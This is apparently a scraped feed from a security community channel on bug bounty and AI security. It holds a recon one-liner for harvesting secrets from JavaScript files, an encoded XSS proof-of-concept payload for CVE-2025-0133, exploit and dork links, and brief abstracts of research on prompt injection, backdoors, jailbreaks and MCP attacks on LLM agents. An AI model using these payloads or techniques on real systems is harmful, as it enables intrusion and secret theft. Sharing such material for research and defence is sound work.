2777
🛡️ Cybersecurity enthusiast | 💻 Helping secure the digital world | 🌐 Web App Tester | 🕵️♂️ OSINT Specialist Admin: @laazy_hack3r
Find sensitive information with gf# Search for testing point with gau and fff
gau target -subs | cut -d"?" -f1 | grep -E "\.js+(?:on|)$" | tee urls.txt
sort -u urls.txt | fff -s 200 -o out/
# After we save responses from known URLs, it's time to dig for secrets
for i in `gf -list`; do [[ ${i} =~ "_secrets"* ]] && gf ${i}; done
𝗠𝗖𝗣 𝗦𝗲𝗰𝘂𝗿𝗶𝘁𝘆 𝗥𝗲𝘀𝗼𝘂𝗿𝗰𝗲𝘀
🔗 Awesome MCP Security:
https://github.com/Puliczek/awesome-mcp-security
🔗 Defensive Guide :
https://www.infracloud.io/blogs/securing-mcp-servers/
🔗 MCP Tool :
https://github.com/eqtylab/mcp-guardian
🔗 MCP Threat Modeling :
https://www.csoonline.com/article/4023795/top-10-mcp-vulnerabilities.html
🔗 MCP Security Research :
https://arxiv.org/pdf/2507.06250
🔗 MCP Security Article :
https://www.darkreading.com/application-security/agentic-ai-risky-mcp-backbone-attack-vectors
🔗 MCP Security 101 Guide :
https://www.redhat.com/en/blog/model-context-protocol-mcp-understanding-security-risks-and-controls
🔗 MCP Top Vulnerability :
https://cymulate.com/blog/cve-2025-53109-53110-escaperoute-anthropic/
🔗 MCP Security Video :
https://m.youtube.com/watch?v=zj29lslZxFg
@acesclan #mcp #agentic #ai
#info #Events #Cyber_Education
Cybersecurity Events Sep. - Dec. 2025:
1. Cyber-AI 2025 (Sep. 1-4)
2. Nullcon Berlin (Sep. 3-5)
3. Blue Team Con (Sep. 4-7)
4. SECCON 2025 (Sep. 9)
5. 44CON (Sep. 18-19)
6. National Cyber Summit (Sep. 23-25)
7. HackAICon 2025 (Sep. 25)
8. ESORICS 2025 (Sep. 22-26)
9. BruCON 2025 (Sep. 25-26)
10. COSAC 2025 (Sep.28 - Oct.2)
11. Black Hat AI Summit at SecTor (Sep.30 - Oct.2)
12. Hexacon 2025 (Oct. 4-5)
13. Offensive AI Con 2025 (Oct. 5-8)
14. c0c0n 2025 (Oct. 7-11)
15. Black Hat Fall Online Trainings (Oct. 20-23)
16. OWASP LASCON 2025 (Oct. 21-22)
17. IEEE ISSRE 2025 (Oct. 21-24)
18. DevSecCon 2025 (Oct. 22)
19. SAINTCON 2025 (Oct. 21-24)
20. IAPP Privacy.Security.Risk (Oct. 28-31)
21. OSINTCon 2025 (Nov. 1-2)
22. SANS Fall Cyber Solutions Fest - AI Track (Nov. 6)
23. DEATHCon (Nov. 8-9)
24. POC2025 Hacking Conference (Nov. 13-14)
25. SURICON 2025 (Nov. 19-21)
26. Black Hat Middle East & Africa (Dec. 2-4)
27. Black Hat Europe 2025 (Dec. 8-11)
28. Annual Computer Security Applications Conference (ACSAC2025) (Dec. 8-12)
29. BSidesTLV 2025 (Dec. 11)
30. SANS Cyber Defense Initiative (Dec. 12-17)
🌘 From Prompt Injections to Protocol Exploits:Threats in LLM-Powered AI Agents Workflows, 2025.
// In this Research, we introduce the first unified, end-to-end threat model for LLM-agent ecosystems, spanning host-to-tool and agent-to-agent communications, formalize adversary capabilities and attacker objectives, and catalog over thirty attack techniques. We organized the threat model into four domains: Input Manipulation (prompt injections, long-context hijacks, multimodal adversarial inputs), Model Compromise (prompt- and parameter-level backdoors, composite and encrypted multi-backdoors, poisoning strategies), System and Privacy Attacks (speculative side-channels, membership inference, retrieval poisoning, social-engineering simulations), and Protocol Vulnerabilities (exploits in Model Context Protocol, Agent Communication Protocol, Agent Network Protocol, Agent-to-Agent protocol)
🧩 #Research #MLSecOps
#Threat_Research
#Offensive_security
"Teaching LLMs how to XSS:
An introduction to fine-tuning and reinforcement learning (using your own GPU)", 2025.
// ways to automate XSS with LLMs as a learning exercise
✨List of Awesome Red Team / Red Teaming Resources. This list is for anyone wishing to learn about Red Teaming but do not have a starting point.
https://github.com/0xMrNiko/Awesome-Red-Teaming
Asset inventory of over 800 public bug bounty programs.
https://github.com/trickest/inventory
🚨CVE-2025-0133 : Payload + Template
Payload: %3Csvg%20xmlns%3D%22http%3A%2F%http://2Fwww.w3.org%2F2000%2Fsvg%22%3E%3Cscript%3Eprompt%28%22XSS%22%29%3C%2Fscript%3E%3C%2Fsvg%3E
Write-up: https://codewithvamp.medium.com/cve-2025-0133-reflected-xss-vulnerability-in-palo-alto-globalprotect-gateway-portal-028128f2f5b9
Template: https://github.com/projectdiscovery/nuclei-templates/blob/main/http/cves/2025/CVE-2025-0133.yaml
#Research
#MLSecOps
"Generative AI in cybersecurity:
A Comprehensive Review of LLM Applications and Vulnerabilities", 2025.
// This paper provides a comprehensive review of the future of cybersecurity through GenAI and LLMs. We explore LLM applications across various domains, including hardware design security, intrusion detection, software engineering, design verification, cyber threat intelligence, malware and phishing detection. We present an overview of LLM evolution and its current state. Our analysis extends to LLM vulnerabilities, such as prompt injection, insecure output handling, data poisoning, DDoS, and adversarial instructions
🚨 CVE-2025-53652: Jenkins Git Parameter Plugin Unvalidated Input Vulnerability
🔥PoC :https://github.com/pl4tyz/CVE-2025-53652-Jenkins-Git-Parameter-Analysis
👇Dorks
HUNTER : http://product.name="Jenkins"
📰Refer:https://jenkins.io/security/advisory/2025-07-09/#SECURITY-3419
https://github.com/advisories/GHSA-qcj2-99cg-mppf
Hello, guys i am planning for a team to attend https://16.standoff365.com/en/#how_to_join
it has a 10 members per team if you guys are intrested and happy to try this CTF let me know.
#Cloud_Security
Black Hat USA 2025:
"Expanding Privileges in the Cloud:
Exploring Security Boundaries in Amazon ECS".
]-> PoC for CVE-Requested vulnerability in Amazon ECS allowing cross-task IAM credential theft
⚡Automated red-team toolkit for stress-testing LLM defences - Vector Attacks on LLMs
✅https://github.com/MrMoshkovitz/gandalf-llm-pentester
Google 🔍 Engineer dropped a book. A comprehensive guide to building agentic AI systems.
Key points:Concepts: Prompt chaining, routing, memory, planning, safety, and evaluation.
✅Patterns: Design methods for multi-agent setups, tool-using agents, and autonomous workflows.
✅Hands-on: Code samples for implementing these patterns in real-world apps.
✅Goal: Help developers build reliable, scalable, and safe intelligent agents.
Think of it as a playbook for advanced AI agent design.
#Tech_book
"Advanced Python for Cybersecurity:
Techniques in Malware Analysis, Exploit Development, and Custom Tool Creation", 2024.
// By integrating Python into your cybersecurity arsenal, you can automate repetitive tasks, enhance your analytical capabilities, forge custom tools tailored to specific threats, and ultimately fortify your defenses against an ever-evolving adversary
🔖 Application Programming Interface (API):
Vulnerabilities and Risks", Special Report
🌘 2024
// This report describes 11 common vulnerabilities and 3 risks related to APIs, providing suggestions about how to fix or reduce their impact. Recommendations include using a standard API documentation process, using automated testing, and ensuring the security of the identity and access management system
See also:
]-> API Specification Parser
]-> Tool to detect API auth weaknesses
]-> API Security Vulnerability Scanner
🧩 #AppSec #Whitepaper
🧩 #Threat_Research
https://xmind.app/mindmap/zseanos-methodology/TidUQd/?from=gallery#
Читать полностью…
#AIOps
#MLSecOps
"Security Attacks on LLM-based Code Completion Tools", v.4, AAAI 2025.
]-> example code and attack samples
// LLM-based Code Completion Tools (LCCTs) often rely on proprietary code datasets for training, raising concerns about the potential exposure of sensitive data. We exploit these distinct characteristics of LCCTs to develop targeted attack methodologies on two critical security risks: jailbreaking and training data extraction attacks
BB Target- https://www.nooks.ai/responsible-disclosure-process
🔥Fresh BB Target - https://www.computerwaard.nl/.well-known/security.txt
Читать полностью…
DomLoggerpp by @kevin_mizu is a simple web extension that helps you identify JavaScript DOM sinks that could lead to DOM-based vulnerabilities (such as XSS)! 😎
Check it out! 👇
🔗 https://github.com/kevin-mizu/domloggerpp
Notes from "How to Crush Bug Bounties in the first 12 Months" by @hakluke
Читать полностью…
https://x.com/Cipher0ps_tech/status/1954777074457251865
Читать полностью…
#Research
"Llama-3.1-FoundationAI-SecurityLLM-8B-Instruct (FS8BI)
Technical Report", 2025.
]-> https://huggingface.co/fdtn-ai/Foundation-Sec-8B-Instruct
// FS8BI - open-weight, 8-billion parameter instruction-tuned LLM specialized for cybersecurity applications. It leverages prior training to understand security concepts, terminology, and practices across multiple security domains. FS8BI enables organizations to build AI-driven security tools that can be deployed locally, reducing dependency on cloud-based AI services